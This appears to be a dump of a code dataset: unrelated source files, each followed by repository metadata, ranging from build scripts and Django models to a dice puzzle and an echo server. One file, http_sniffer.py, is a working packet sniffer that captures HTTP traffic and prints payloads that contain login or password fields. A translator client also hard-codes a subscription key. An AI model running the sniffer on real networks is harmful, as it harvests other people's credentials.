        print("Win32 build succeeded.")
    def build_ios_mac(self):
        """Build every configured xcode target for iOS (simulator + device,
        merged into fat libraries with lipo) and for Mac; optionally strip."""
        for key in self.xcode_proj_info.keys():
            output_dir = self.xcode_proj_info[key][Generator.KEY_OUTPUT_DIR]
            proj_path = os.path.join(self.engine_dir, key)
            ios_out_dir = os.path.join(self.tool_dir, output_dir, "ios")
            mac_out_dir = os.path.join(self.tool_dir, output_dir, "mac")
            ios_sim_libs_dir = os.path.join(ios_out_dir, "simulator")
            ios_dev_libs_dir = os.path.join(ios_out_dir, "device")
            for target in self.xcode_proj_info[key][Generator.KEY_TARGETS]:
                build_cmd = Generator.XCODE_CMD_FMT % (proj_path, "%s iOS" % target, "-sdk iphonesimulator", ios_sim_libs_dir)
                run_shell(build_cmd, self.tool_dir)
                build_cmd = Generator.XCODE_CMD_FMT % (proj_path, "%s iOS" % target, "-sdk iphoneos", ios_dev_libs_dir)
                run_shell(build_cmd, self.tool_dir)
                build_cmd = Generator.XCODE_CMD_FMT % (proj_path, "%s Mac" % target, "", mac_out_dir)
                run_shell(build_cmd, self.tool_dir)
            # generate fat libs for iOS
            for lib in os.listdir(ios_sim_libs_dir):
                sim_lib = os.path.join(ios_sim_libs_dir, lib)
                dev_lib = os.path.join(ios_dev_libs_dir, lib)
                output_lib = os.path.join(ios_out_dir, lib)
                lipo_cmd = "lipo -create -output \"%s\" \"%s\" \"%s\"" % (output_lib, sim_lib, dev_lib)
                run_shell(lipo_cmd)
            # remove the simulator & device libs in iOS
            shutil.rmtree(ios_sim_libs_dir)
            shutil.rmtree(ios_dev_libs_dir)
            if self.enable_strip:
                # strip the libs
                ios_strip_cmd = "xcrun -sdk iphoneos strip -S %s/*.a" % ios_out_dir
                run_shell(ios_strip_cmd)
                mac_strip_cmd = "xcrun strip -S %s/*.a" % mac_out_dir
                run_shell(mac_strip_cmd)
    def build_all_libs(self):
        """Dispatch the platform builds supported from the current host OS."""
        if os_is_mac():
            # build for iOS & Mac
            self.build_ios_mac()
        if os_is_win32():
            # build for win32
            self.build_win32()
        if not self.no_android:
            self.build_android()
    def do_generate(self):
        """Entry point: optionally wipe the prebuilt dir, then build all libs."""
        output_dir = os.path.join(self.tool_dir, "prebuilt")
        if self.need_clean and os.path.exists(output_dir):
            shutil.rmtree(output_dir)
        self.build_all_libs()
if __name__ == "__main__":
    # Command-line entry: parse flags, then run the generator.
    parser = ArgumentParser(description="Generate prebuilt engine for Cocos Engine.")
    parser.add_argument('-c', dest='need_clean', action="store_true", help='Remove the \"prebuilt\" directory first.')
    parser.add_argument('-n', "--no-android", dest='no_android', action="store_true", help='Not build android libs.')
    parser.add_argument('-s', "--strip", dest='enable_strip', action="store_true", help='Strip the generated libs.')
    parser.add_argument('-i', "--incredibuild", dest='use_incredibuild', action="store_true", help='Use incredibuild to build win32 projects. Only available on windows.')
    (args, unknown) = parser.parse_known_args()
    if len(unknown) > 0:
        # Unknown flags are reported but not fatal (parse_known_args).
        print("unknown arguments: %s" % unknown)
    gen_obj = Generator(args)
    gen_obj.do_generate()
| [
"sinhyub@gmail.com"
] | sinhyub@gmail.com |
a5d01803894a913c19db18352f78d138ce00dd9c | 3577df7abbb49dc3e83dc116cfb9e9e9f44bfbe9 | /Init.py | bb145731f27124e5c2a5ebcd9424de615b771306 | [
"MIT"
] | permissive | Garretming/IMSiLopKit | 646fb3b4029f52caa0930549607e734f9b9af4c6 | a55da2da9a055fbc96ccf97cce738405a6d8523b | refs/heads/master | 2023-05-14T00:36:55.929067 | 2021-06-10T10:07:36 | 2021-06-10T10:07:36 | 375,615,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,234 | py | '''
Author: your name
Date: 2019-03-08 15:17:28
LastEditTime: 2021-06-10 15:49:40
LastEditors: Please set LastEditors
Description: In User Settings Edit
FilePath: /IMSiLopKit/pod_auto_script/gitInit.py
'''
#!/usr/bin/evn python3
#coding=utf-8
import os
import sys
def parseArgument():
    """Return the process's command-line arguments (argv[0] included) as a list.

    Expected layout when arguments are supplied (per the caller below):
    argv[1] commit message, argv[2] repository group, argv[3] project name.
    NOTE(review): the original header comment listed a different order --
    confirm which is intended.
    """
    # The original built this list by indexing sys.argv in a manual loop;
    # list(sys.argv) is the idiomatic equivalent.
    return list(sys.argv)
if __name__ == '__main__':
    # Re-initialise the current directory as a git repo, create the GitHub
    # repository via the API, and push the first commit.
    argus = parseArgument()
    path =os.getcwd()
    count = 0
    for k, v in enumerate(argus):
        # print k, v
        count = count + 1
    # NOTE(review): `count > 2` is redundant next to `count >= 4`; count is
    # simply len(argus).
    if count >2 and count >=4 :
        # commit message note
        mes = argus[1]
        # repository group name
        store = argus[2]
        # project name
        name = argus[3]
    else:
        # commit message note ("没有备注" means "no note")
        mes = "没有备注"
        # repository group name
        store = "Garretming"
        # project name
        name = os.path.basename(path)
    # os.system('git remote add origin git@gitlab.com:' + store +'/' + name +'.git')
    # DANGER: wipes any existing git history in the working directory.
    os.system('rm -rf .git')
    os.system('git init')
    # NOTE(review): repo name/description are hard-coded here; `store` and
    # `name` computed above are not actually used by these commands.
    os.system('curl -u Garretming -d \'{"name":"IMSiLopKit","description":"IMSiLopKit is a ui for slg games"}\' https://api.github.com/user/repos')
    os.system('git remote add origin git@github.com:Garretming/IMSiLopKit.git')
    # os.system('git submodule add git@github.com:Garretming/csb2csd.git csb2csd')
    # os.system('git submodule add git@gitlab.com:Clark8/apktool.git apktool')
    # os.system('git submodule add https://github.com/cloudwu/skynet.git skynet')
    # os.system('git submodule add https://github.com/simongog/sdsl-lite.git 3rd/sdsl-lite')
    # os.system('git submodule add https://github.com/driedfruit/jenkins-minimal-perfect-hash.git 3rd/perfect-hash')
    # os.system('git submodule add https://github.com/mpx/lua-cjson.git 3rd/cjson')
    # os.system('git submodule add https://github.com/cloudwu/pbc.git 3rd/pbc')
    os.system('git add .gitignore')
    # os.system('git pull --rebase')
    os.system('git commit -m ' + '\"' + mes + '\"')
    # os.system('git stash')
    os.system('git push -u origin master')
| [
"Please make sure you have the correct access rightsand the repository exists.Completed with errors, see abovePushing to gitee.com:Garret_829/ghiot.gitgit@gitee.com: Permission denied (publickey).plyy520523@qq.com"
] | Please make sure you have the correct access rightsand the repository exists.Completed with errors, see abovePushing to gitee.com:Garret_829/ghiot.gitgit@gitee.com: Permission denied (publickey).plyy520523@qq.com |
b931342b6d9004f19690c272364da7cf8f82d932 | 343bfc5758566f31bb4f49ad870d81102b8a8cd2 | /inference.py | 9481a031a6f4116a90beee2351e9dbbaf7a3d17f | [
"Apache-2.0"
] | permissive | anminhhung/GAN-Pytorch-Template | fd3875a3837cff7a868f60568da36ff58055df21 | 5ea1a43a4b9957c1a683477645dca6fcedf3c313 | refs/heads/master | 2023-04-01T19:59:40.256016 | 2019-02-24T16:00:10 | 2019-02-24T16:00:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,215 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import numpy as np
import cv2
import torch
import torch.nn.functional as F
from torch.autograd import Variable
import torchvision.transforms as transforms
class TagPytorchInference(object):
    """Template for running tag-classification inference with a PyTorch model.

    NOTE(review): _create_model and _load are unfilled placeholders; as
    written self.net is None and net.eval() in __init__ would raise -- a
    subclass/caller is expected to supply the real network and weights.
    """
    def __init__(self, **kwargs):
        # Fixed square input resolution fed to the network.
        _input_size = 320
        self.input_size = (_input_size, _input_size)
        # Select the visible GPU before any CUDA context is created.
        self.gpu_index = kwargs.get('gpu_index', '0')
        os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
        os.environ["CUDA_VISIBLE_DEVICES"] = self.gpu_index
        # build net
        self.net = self._create_model(**kwargs)
        # load weights from model
        self._load(**kwargs)
        self.net.eval()
        self.transforms = transforms.ToTensor()
        if torch.cuda.is_available():
            self.net.cuda()
    def close(self):
        # Release cached GPU memory held by PyTorch.
        torch.cuda.empty_cache()
    def _create_model(self, **kwargs):
        """
        build net
        :param kwargs:
        :return:
        """
        # build net
        net = None  # placeholder: construct and return the real model here
        return net
    def _load(self, **kwargs):
        """
        load weights
        :param kwargs:
        :return:
        """
        model_filename = None  # placeholder: path to the trained weights file
        state_dict = torch.load(model_filename, map_location=None)
        self.net.load_state_dict(state_dict)
    def run(self, image_data, **kwargs):
        """Run one forward pass on an image array (assumed BGR, HxWxC --
        TODO confirm) and return the raw network output as nested lists."""
        _image_data = self.image_preprocess(image_data)
        input = self.transforms(_image_data)
        _size = input.size()
        # Add the batch dimension: (C, H, W) -> (1, C, H, W).
        input = input.resize_(1, _size[0], _size[1], _size[2])
        if torch.cuda.is_available():
            input = input.cuda()
        out = self.net(Variable(input))
        return out.data.cpu().numpy().tolist()
    def image_preprocess(self, image_data):
        """Resize to the network input size and reverse the channel order."""
        _image = cv2.resize(image_data, self.input_size)
        _image = _image[:,:,::-1] # bgr2rgb
        return _image.copy()
if __name__ == "__main__":
    # NOTE(review): module_name, net_name, num_classes, model_name,
    # input_size and image are not defined anywhere in this file -- this demo
    # block only documents the intended call shape and cannot run as-is.
    tagInfer = TagPytorchInference(module_name=module_name,net_name=net_name,
                                   num_classes=num_classes, model_name=model_name,
                                   input_size=input_size)
    result = tagInfer.run(image)
    # post-processing with result
    pass
    print('done!')
"frotms@gmail.com"
] | frotms@gmail.com |
72686e90d0df1916583d7cc774458465981a2994 | 2029fa6e3446c5e01b27739e7e0dcac7b3791fef | /count_wins.py | 88c1a4d64dfeb1a744d9a96517adbfe6d23266e3 | [
"MIT"
] | permissive | alan-nguyen/master-python | 82daa7341ba9e68ced9125d8833b00ae04a6e948 | 2e1cc773123f4bdb0ab2ff0acd667e2e16ccdc4f | refs/heads/master | 2021-08-18T15:58:38.207359 | 2020-07-02T04:12:24 | 2020-07-02T04:12:24 | 200,452,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | def count_wins(dice1, dice2):
assert len(dice1) == 6 and len(dice2) == 6
dice1_wins, dice2_wins = 0, 0
for i in range(0, len(dice1)):
for j in range(0, len(dice2)):
if dice1[i] > dice2[j]:
dice1_wins += 1
elif dice1[i] < dice2[j]:
dice2_wins += 1
return (dice1_wins, dice2_wins)
# # Test cases
# dice1 = [1, 2, 3, 4, 5, 6]
# dice2 = [1, 2, 3, 4, 5, 6]
# # Expect 15, 15
# print(count_wins(dice1, dice2))
# dice1 = [1, 1, 6, 6, 8, 8]
# dice2 = [2, 2, 4, 4, 9, 9]
# # Expect 16, 20
# print(count_wins(dice1, dice2))
def find_the_best_dice(dices):
    """Return the index of the die that beats every other die, or -1.

    A die "beats" another when it wins strictly more face pairings
    (see count_wins).
    """
    assert all(len(dice) == 6 for dice in dices)
    total = len(dices)
    # Number of head-to-head victories per die.
    scores = [0] * total
    for first in range(total):
        for second in range(first + 1, total):
            wins_first, wins_second = count_wins(dices[first], dices[second])
            if wins_first > wins_second:
                scores[first] += 1
            elif wins_first < wins_second:
                scores[second] += 1
    # A best die must have beaten all of the other total-1 dice.
    for index, score in enumerate(scores):
        if score == total - 1:
            return index
    # No best dice
    return -1
# Test cases
# test1 is the classic intransitive trio (each die beats one and loses to
# another), so no overall best die exists.
test1 = [[1, 1, 6, 6, 8, 8], [2, 2, 4, 4, 9, 9], [3, 3, 5, 5, 7, 7]]
# Expected result -1
print(find_the_best_dice(test1))
test2 = [[1, 1, 2, 4, 5, 7], [1, 2, 2, 3, 4, 7], [1, 2, 3, 4, 5, 6]]
# Expected result 2
print(find_the_best_dice(test2))
test3 = [[3, 3, 3, 3, 3, 3], [6, 6, 2, 2, 2, 2], [4, 4, 4, 4, 0, 0], [5, 5, 5, 1, 1, 1]]
# Expected result -1
print(find_the_best_dice(test3))
"tuan8101@gmail.com"
] | tuan8101@gmail.com |
e7ac1d8c71f70a2ebee9d88a3804542fdc12abc1 | d594f3926f6379ef7c382c608cb211f507240420 | /csunplugged/tests/classic/management/test_loadclassicpages_command.py | 7a33734206fe1f6e5621b4183a0ba25918999801 | [
"LicenseRef-scancode-secret-labs-2011",
"MIT",
"OFL-1.1",
"LGPL-2.0-or-later",
"AGPL-3.0-only",
"CC-BY-4.0",
"Apache-2.0",
"BSD-3-Clause",
"CC-BY-SA-4.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | uccser/cs-unplugged | 0b9151f84dd490d5b90771a3706327a623d39edc | 363e281ff17cefdef0ec61078b1718eef2eaf71a | refs/heads/develop | 2023-08-25T08:45:29.833025 | 2023-08-22T02:58:35 | 2023-08-22T02:58:35 | 66,315,075 | 200 | 41 | MIT | 2023-09-14T02:15:40 | 2016-08-22T23:16:40 | Python | UTF-8 | Python | false | false | 698 | py | """Module for the testing custom Django loadclassicpages commands."""
from unittest import mock
from tests.BaseTestWithDB import BaseTestWithDB
from django.core import management
from django.test import tag
@tag("management")
class LoadClassicPagesCommandTest(BaseTestWithDB):
    """Tests for the custom `loadclassicpages` management command."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Locale used by BaseTestWithDB when preparing test data.
        self.language = "en"
    @mock.patch(
        "classic.management.commands._ClassicPagesLoader.ClassicPagesLoader.load",
        return_value=True
    )
    def test_loadclassicpages_command(self, classic_pages_loader):
        # The loader itself is mocked out; we only assert that the command
        # dispatches to ClassicPagesLoader.load.
        management.call_command("loadclassicpages")
        self.assertTrue(classic_pages_loader.called)
| [
"jackmorgannz@gmail.com"
] | jackmorgannz@gmail.com |
051c053b73a14b7fad3a06b450de5056cf8a044c | 16385e10f6ad05b8147517daf2f40dbdda02617c | /site-packages/cs.web-15.3.0.6-py2.7.egg/cs/web/components/static/react/__init__.py | 90e19c2b4dcc68a2577b0068f52d34e7587580fb | [] | no_license | prachipainuly-rbei/devops-poc | 308d6cab02c14ffd23a0998ff88d9ed0420f513a | 6bc932c67bc8d93b873838ae6d9fb8d33c72234d | refs/heads/master | 2020-04-18T01:26:10.152844 | 2019-02-01T12:25:19 | 2019-02-01T12:25:19 | 167,118,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | #!/usr/bin/env python
# -*- mode: python; coding: utf-8 -*-
#
# Copyright (C) 1990 - 2016 CONTACT Software GmbH
# All rights reserved.
# http://www.contact.de/
#
"""
"""
__docformat__ = "restructuredtext en"
__revision__ = "$Id: __init__.py 161953 2017-07-20 12:55:37Z yzh $"
from . import v15_6_1
__all__ = ["v15_6_1"]
| [
"PPR4COB@rbeigcn.com"
] | PPR4COB@rbeigcn.com |
32dc1c88a380742ad5859299a1edd666250cb48c | 594d954fb5552bfd7a4cbf975813e0134e5dc9fa | /Problems/Vowels and consonants/main.py | 8d1301179e0e485f94fac12ab6cfcee26ec9bec8 | [] | no_license | dhanin/Hangman | c21987bb0c7b2a3968d53d3aee398ac3850c55f0 | 83c3c128be0ca21b8b8e02def7f13f5f3b70f52f | refs/heads/master | 2023-03-22T01:51:54.030523 | 2021-03-18T16:31:57 | 2021-03-18T16:31:57 | 349,144,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | string = input()
for ch in string:
if not ch.isalpha():
break
else:
print("vowel") if ch in "aeiou" else print("consonant")
| [
"php_th@yahoo.com"
] | php_th@yahoo.com |
ff0e88f34eb6938840ec84f1427cc15edb606eef | 36d269be264a99ebfd95139a5f949663c588c96a | /sniffer/sniffer/http_sniffer.py | f4fdcb2ba6bf65fa71db3659070e5241e4059c2c | [] | no_license | chulman/packet-sniffer | 0fc2e82539cf4ff115b70ced859f102304f5c68a | a3ee086a4f93bbf245cf0a774e3cf5d5f570269d | refs/heads/master | 2020-04-20T13:06:13.672813 | 2019-02-23T13:45:34 | 2019-02-23T13:45:34 | 168,860,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,923 | py | import hexdump
import scapy.all as scapy
from scapy_http import http
from datetime import datetime
import json
from collections import OrderedDict
from django_redis import get_redis_connection
from django.core.cache import cache
import argparse
def get_arguments():
    """Parse and return the command-line options (-i/--interface)."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--interface", dest="interface", help="Interface name")
    return parser.parse_args()
# Uses scapy_http's http.HTTPRequest layer to pick out HTTP packets only.
# The URL is reassembled as Host + Path (i.e. http://Host/...Path).
def get_url(packet):
    """Return the request URL (Host + Path) of an HTTP request packet.

    NOTE(review): with scapy on Python 3 these fields are bytes, so the
    concatenation result is bytes -- confirm callers expect that.
    """
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_credentials(packet):
    """Return the raw payload when it looks like it carries credentials.

    Scans the packet's Raw layer for common login-form keywords; returns
    None when there is no Raw layer or no keyword matches.
    """
    if not packet.haslayer(scapy.Raw):
        return None
    load = packet[scapy.Raw].load
    interesting = ["login", "password", "username", "user", "pass"]
    if any(word in load for word in interesting):
        return load
def process_packets(packet):
    """Per-packet sniffer callback: archive the packet to redis and report
    HTTP requests / possible credentials to stdout."""
    date=datetime.today().strftime("%Y/%m/%d-%H:%M:%S")
    hex_packet = hexdump.hexdump(bytes(packet),'return')  # NOTE(review): computed but never used
    group_data = OrderedDict()
    group_data["date"] = date
    group_data["packet"] = str(packet)
    json_data=json.dumps(group_data, ensure_ascii=False, indent="\t")
    # redis, connection pool, redis save
    con = get_redis_connection("default")
    # NOTE(review): expire() is issued before lpush(); on a fresh key it is a
    # no-op, so the list may end up without a TTL -- confirm the ordering.
    con.expire(date,60*10)
    con.lpush(date,json_data)
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] Http Request >> " + url)
        credentials = get_credentials(packet)
        if credentials:
            # NOTE(review): "passowrd" typo and missing space in this
            # user-facing message (left untouched here).
            print("[+] Possible username/passowrd" + credentials + "\n\n")
# iface : network interface.
# store : store result in memory.
# prn : function name.
def sniff_packet(interface):
    """Capture packets on *interface* indefinitely, handing each one to
    process_packets (packets are not kept in memory: store=False)."""
    scapy.sniff(iface=interface, store=False, prn=process_packets)
# options = get_arguments()
# sniff_packet(options.interface)
| [
"chlcjfals0122@gmail.com"
] | chlcjfals0122@gmail.com |
ccd8344a9f13bb3a798f2065a30bd0d715bb5bb0 | 7d1c3551a44cb940fab63a808f953e807f5b2a28 | /tradeNappApi/wsgi.py | 5c17b9303b7469097cf62dfc475d47a3d11d9782 | [] | no_license | GayathriRaja/tradeNappApi | 356515c2d9c382aaadae8cfd1102239046b2f13f | 90bd0f59566d6ebacf1db1c1834455ffe7a2d849 | refs/heads/master | 2022-12-29T06:03:26.854219 | 2020-09-30T14:24:18 | 2020-09-30T14:24:18 | 299,532,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for tradeNappApi project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings unless the environment already does.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tradeNappApi.settings')
# WSGI callable picked up by the application server (gunicorn/uwsgi/etc.).
application = get_wsgi_application()
| [
"gayathrraja@gmail.com"
] | gayathrraja@gmail.com |
3aff4072976515670e34f948342becfa4c2b18e7 | 2bdedcda705f6dcf45a1e9a090377f892bcb58bb | /src/main/output/group_morning/school/study/parent.py | 7e99ab840ff28cb6a18c2c4e39a3c3281a2a0f69 | [] | no_license | matkosoric/GenericNameTesting | 860a22af1098dda9ea9e24a1fc681bb728aa2d69 | 03f4a38229c28bc6d83258e5a84fce4b189d5f00 | refs/heads/master | 2021-01-08T22:35:20.022350 | 2020-02-21T11:28:21 | 2020-02-21T11:28:21 | 242,123,053 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,730 | py | var express = require('express');
let https = require ('https');
let body = '';
let subscriptionKey = 'b53239afba713a1cdd73ee9877849c8c';
let host = 'api.microsofttranslator.com';
let path = '/V2/Http.svc/TranslateArray';
let target = 'en';
let params = '';
let ns = "http://schemas.microsoft.com/2003/10/Serialization/Arrays";
let content =
'<TranslateArrayRequest>\n' +
// NOTE: AppId is required, but it can be empty because we are sending the Ocp-Apim-Subscription-Key header.
' <AppId />\n' +
' <Texts>\n' +
' <string xmlns=\"' + ns + '\">돼지</string>\n' +
' <string xmlns=\"' + ns + '\">소고기</string>\n' +
' <string xmlns=\"' + ns + '\">닭고기</string>\n' +
' <string xmlns=\"' + ns + '\">같은 제조시설</string>\n' +
' </Texts>\n' +
' <To>' + target + '</To>\n' +
'</TranslateArrayRequest>\n';
// Public entry point: fires the TranslateArray request.  Declared async but
// GetTranslationsArray is callback-based, so the returned promise resolves
// before the HTTP response arrives (result is only logged, not returned).
module.exports.Translate = async function() {
    GetTranslationsArray();
}
// POST the prepared XML `content` to the TranslateArray endpoint; the
// response is consumed by response_handler.
let GetTranslationsArray = function () {
    let request_params = {
        method : 'POST',
        hostname : host,
        path : path + params,
        headers : {
            'Content-Type' : 'text/xml',
            // NOTE(review): this header name looks corrupted -- per the
            // comment embedded in `content`, it should presumably be
            // 'Ocp-Apim-Subscription-Key'; confirm before use.
            'f5d83a0fd0bdf404234022afe41fc65d' : subscriptionKey,
        }
    };
    let req = https.request (request_params, response_handler);
    req.write (content);
    req.end ();
}
// Collects the HTTP response body and logs it once the stream ends.
let response_handler = function (response) {
    // Accumulate into a local buffer: the previous version appended to the
    // module-level `body`, so a second request would log stale data from
    // the first.
    let collected = '';
    response.on ('data', function (d) {
        collected += d;
    });
    response.on ('end', function () {
        console.log ('[[[[[[end]]]]]]' + collected);
        return collected;
    });
    response.on ('error', function (e) {
        console.log ('Error: ' + e.message);
    });
};
/*
let response_handler = function (response) {
let body = '';
response.on ('data', function (d) {
body += d;
});
response.on ('end', function () {
console.log (body);
});
response.on ('error', function (e) {
console.log ('Error: ' + e.message);
});
};
module.exports.Translate = function(){
// Replace the subscriptionKey string value with your valid subscription key.
let host = 'api.microsofttranslator.com';
let path = '/V2/Http.svc/Translate';
//let from = 'unk';from=' + from + '
let target = 'en';
let text = '안녕. 좋은 아침입니다.';
let params = '?to=' + target + '&text=' + encodeURI(text);
let request_params = {
method : 'GET',
hostname : host,
path : path + params,
headers : {
'9d68e3c6ee03aa3badea4b764596a363' : subscriptionKey,
}
};
let req = https.request (request_params, response_handler);
req.end ();
console.log(req);
return req;
};
*/
| [
"soric.matko@gmail.com"
] | soric.matko@gmail.com |
d180c9a0488339e766e7d36b3df378032e8065f1 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02970/s808061498.py | 84c4907d1b62a518823b275a00f596abd485e54d | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | N, D = map(int, input().split())
# Each inspector placed at position i covers trees [i-D, i+D], i.e. a span of
# 2*D + 1 trees, so the minimum number of inspectors is ceil(N / (2*D + 1)).
span = 2 * D + 1
ans = (N + span - 1) // span  # integer ceiling division, no if/else needed
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
9d6e15952bf0ebce83bc403f916e3f4a0fe4cb14 | 5c783f40027536bf04a54fddd4545f06c122b62b | /contents/models.py | b7212b3566e4cb3e62f06c1c9d4c1733649a859a | [] | no_license | stuartelimu/sb-intranet | ab45d54e1f7b72a3d1cb27b7db666fca1b43fa3c | af4a2e929397188a1bee9bd26de0468857b4cd4f | refs/heads/master | 2023-01-22T17:00:52.597000 | 2020-11-19T05:51:20 | 2020-11-19T05:51:20 | 263,233,850 | 0 | 1 | null | 2020-11-19T05:53:14 | 2020-05-12T04:39:53 | HTML | UTF-8 | Python | false | false | 680 | py | from django.db import models
from tinymce import HTMLField
class Category(models.Model):
    """A named grouping label for intranet content."""
    # Display name; also used as the string representation in the admin.
    title = models.CharField(max_length=120)
    def __str__(self):
        return self.title
    class Meta:
        verbose_name_plural = 'Categories'
class Activity(models.Model):
    """An activity with a rich-text description and optional step-by-step guide."""
    title = models.CharField(max_length=120)
    # Rich-text fields rendered/edited via TinyMCE.
    description = HTMLField()
    steps = HTMLField(blank=True)  # optional: may be left empty
    def __str__(self):
        return self.title
    class Meta:
        verbose_name_plural = 'Activities'
class TicketType(models.Model):
    """A kind of support ticket, with rich-text body content.

    The empty ``class Meta: pass`` declaration was removed: it had no effect
    and Django behaves identically without it.
    """
    title = models.CharField(max_length=120)
    # Rich-text body rendered/edited via TinyMCE.
    content = HTMLField()

    def __str__(self):
        return self.title
"stuartelimu@gmail.com"
] | stuartelimu@gmail.com |
163eed9f3ba8509d389a8ddf80630b111e1adc2a | 0d98c690d1d966f953443b0e7ddc007611b8f1b2 | /one_way_anova.py | f6bda915b5caddd618b0d4c9b571b18ea15e1691 | [] | no_license | ianzur/asarco_el_paso | 8c7b71ab447edc89539bb39ad115a637eb3c2b7b | 26a76c27a6c2cc0e9c1241d717cd9b5420e1086e | refs/heads/master | 2022-11-23T15:49:05.168274 | 2020-07-23T20:50:40 | 2020-07-23T20:50:40 | 282,051,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,265 | py | """
Are the average blood lead levels different between children based on the radius (miles) of the smelter where they spent the first two years of their life in 1972? In 1973?
Ho: proximity to the smelter during the first two years of life has NO effect on the mean blood lead level (mu_1 = mu_2)
Ha: proximity to the smelter during the first two years of life increases the mean blood lead level (mu_1 > mu_2)
SPSS:
ONEWAY /VARIABLES= Lead_72 Lead_73 BY FST2YRS
/STATISTICS=DESCRIPTIVES HOMOGENEITY.
"""
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy.stats
# customize plot styling
# https://matplotlib.org/3.2.2/tutorials/introductory/customizing.html
plt.style.use('seaborn-deep')
DATA_PATH = Path("../4. EL PASO DATA.sav")
def main():
    """Run one-way ANOVAs of blood lead level vs. proximity and plot group means.

    Reads the SPSS dataset at DATA_PATH, compares children who lived within one
    mile of the ASARCO smelter for their first two years against those who did
    not, for both the 1972 and 1973 blood-lead measurements, then plots the
    four group means.
    """
    el_paso_data = pd.read_spss(str(DATA_PATH))
    # Rename the terse SPSS column codes to self-describing labels.
    el_paso_data = el_paso_data.rename(
        columns={
            'FST2YRS': "lived first 2 years within 1 mile of ASARCO",
            'Lead_72': "1972 Blood Lead Level (ug / 100mL)",
            'Lead_73': "1973 Blood Lead Level (ug / 100mL)",
        }
    )
    # create boolean mask
    first_2_years = el_paso_data['lived first 2 years within 1 mile of ASARCO'] == 'Yes'
    # 1972: one-way ANOVA (near vs. far groups); NaNs dropped per group.
    bll_1972 = el_paso_data["1972 Blood Lead Level (ug / 100mL)"]
    print(scipy.stats.f_oneway(bll_1972[first_2_years].dropna(), bll_1972[~first_2_years].dropna()))
    # 1973: same test on the following year's measurements.
    bll_1973 = el_paso_data["1973 Blood Lead Level (ug / 100mL)"]
    print(scipy.stats.f_oneway(bll_1973[first_2_years].dropna(), bll_1973[~first_2_years].dropna()))
    # Group means for the summary plot (NaNs are skipped by Series.mean()).
    mean_near_72 = bll_1972[first_2_years].mean()
    mean_far_72 = bll_1972[~first_2_years].mean()
    mean_near_73 = bll_1973[first_2_years].mean()
    mean_far_73 = bll_1973[~first_2_years].mean()
    # Build a flat series indexed like "1972 within 1 mile", sorted so the
    # near/far pairs for each year sit next to each other.
    plot_df = pd.DataFrame(
        {
            '1972': {'within 1 mile': mean_near_72, 'outside 1 mile': mean_far_72} ,
            '1973': {'within 1 mile': mean_near_73, 'outside 1 mile': mean_far_73},
        },
    ).unstack().rename('average blood lead levels ug/dL').sort_index(level=1)
    plot_df.index = [' '.join(col).strip() for col in plot_df.index.values]
    plot_df.plot(style='D-', rot=8)
    plt.show()
if __name__=="__main__":
    main()
| [
"noreply@github.com"
] | ianzur.noreply@github.com |
198ea75f7e5b3646278f8c47370b37ac4214a246 | 13ea4e6f59b1f87302dfa32d2c911263dfe9814f | /server.py | eb40eae9209cffec0e1d59018a58cfabdd89cf98 | [] | no_license | ozirno/PyClientServer-Demo | 07333771160d53ef33d1ab7d087e1ec310303f13 | f2068915408c1b1cce0ae0ab188d07143364d75f | refs/heads/master | 2021-04-12T08:13:23.057505 | 2016-09-25T19:29:55 | 2016-09-25T19:29:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 971 | py | import sys
import socket
import signal
connected = False
def signal_handler(signal, frame):
    # SIGINT (Ctrl-C) handler: close the client connection if one was
    # accepted, then exit cleanly.
    # NOTE(review): the parameter `signal` shadows the imported signal module
    # inside this function body.
    global connection
    global connected
    print('\nExiting')
    if (connected):
        connection.close()
    sys.exit(0)
# Install the Ctrl-C handler before any blocking socket calls.
signal.signal(signal.SIGINT, signal_handler)
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = ('localhost', 10000)
print >>sys.stderr, 'starting up on %s port %s' % server_address
sock.bind(server_address)
# Listen for incoming connections (backlog of 1: single-client echo server)
sock.listen(1)
# Wait for a connection
print >>sys.stderr, 'waiting for a connection'
connection, client_address = sock.accept()
connected = True
print >>sys.stderr, 'connected'
print >>sys.stderr, 'connection from', client_address
while connected:
    # Receive the data in small chunks and retransmit it
    data = connection.recv(1024)
    if data:
        print >>sys.stderr, '(SERVER): received "%s"' % data
        connection.sendall(data)
    else:
        # recv() returning an empty string means the client closed the
        # connection; previously this loop spun forever on zero-byte reads.
        print >>sys.stderr, 'client disconnected'
        connection.close()
        connected = False
